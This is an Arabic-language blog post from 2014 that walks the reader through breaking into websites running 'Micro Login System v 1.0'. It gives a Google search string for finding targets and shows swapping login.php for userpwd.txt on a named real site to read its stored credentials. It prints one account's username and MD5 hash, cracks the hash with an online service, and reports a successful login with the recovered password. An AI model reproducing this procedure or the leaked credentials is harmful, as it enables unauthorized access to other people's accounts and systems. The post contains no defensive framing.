باك لينك

purchase links

الجمعة، 9 مايو 2014

شرح ثغرة intext:"Micro Login System v 1.0

شرح ثغرة
intext:"Micro Login System v 1.0
للاختراق



اولا نروح على جوجل ونكتب
intext:"Micro Login System v 1.0
راح تطلع لنا نتائج ب مواقع
مثلا بدنا هذا الموقع
http://www.accessite.freeola.org/login/login.php
نغير login.php
ل userpwd.txt
بحيث يصير الرابط هكذا
http://www.accessite.freeola.org/login/userpwd.txt
الان ننسخ هذا الرابط
http://www.accessite.freeola.org/login/userpwd.txt
راح يطلع لنا بيانات
للمثال راح اخد اول واحد وهو
martin:da1771c415ae1e44e8a774f2e04fdffc
اسم العضو
martin
كلمة السر [ولكن مشفرة]
da1771c415ae1e44e8a774f2e04fdffc
فك تشفير كلمة السر من هذا الموقع
http://www.hashkiller.co.uk/md5-decrypter.aspx
نفك التشفير وطريقة فك التشفير سهله منه
1= هنا تكتب كلمة السر المشفرة
2= هنا تكتب كود الكابتشا المطلوب كتابته
3= تكبس هنا
4= هذا هو الكود تم فك تشفيره وكلمة السر هي [rovers]
الان نجرب نسجل دخولنا بالبيانات الي اخرجناها
اسم العضو
martin
وكلمة السر
rovers
----------
تم تسجيل الدخول بنجااااااااااح

كان معكم مدير مدونة الامن المعلوماتي
http://amnma3.blogspot.com
.

هناك تعليق واحد: